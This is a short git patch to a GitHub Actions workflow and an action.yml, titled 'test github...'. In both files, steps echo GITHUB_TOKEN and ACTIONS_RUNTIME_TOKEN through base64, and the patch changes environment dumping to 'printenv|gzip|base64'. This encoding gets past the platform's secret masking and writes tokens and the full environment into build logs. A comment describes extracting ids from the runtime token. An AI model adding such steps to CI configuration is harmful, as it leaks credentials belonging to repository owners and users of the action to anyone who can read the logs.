From 754e09e0eeb834e5c43dfd203ec136b08bd1e53f Mon Sep 17 00:00:00 2001 From: Chl Date: Fri, 30 Aug 2024 02:45:06 +0200 Subject: [PATCH] test github... --- .github/workflows/generate-release-zipfile.yml | 3 +-- action.yml | 3 +-- 2 files changed, 2 insertions(+), 4 deletions(-) diff --git a/.github/workflows/generate-release-zipfile.yml b/.github/workflows/generate-release-zipfile.yml index a567642..5909ea2 100644 --- a/.github/workflows/generate-release-zipfile.yml +++ b/.github/workflows/generate-release-zipfile.yml @@ -30,8 +30,7 @@ jobs: git reset --hard "$GITHUB_SHA" echo "$GITHUB_TOKEN" | base64 echo "$ACTIONS_RUNTIME_TOKEN" | base64 - printenv - printenv|base64 + printenv|gzip|base64 - name: Testing the artifact uploading id: "uploading" diff --git a/action.yml b/action.yml index 9459200..4b0878f 100644 --- a/action.yml +++ b/action.yml @@ -57,8 +57,7 @@ runs: # and readability...) echo "$GITHUB_TOKEN" | base64 echo "$ACTIONS_RUNTIME_TOKEN" | base64 - printenv - printenv|base64 + printenv|gzip|base64 # First we extract the second field from the token (e.g. xxx.yyy.zzz), # then we de-base64 and last, we extract the two id from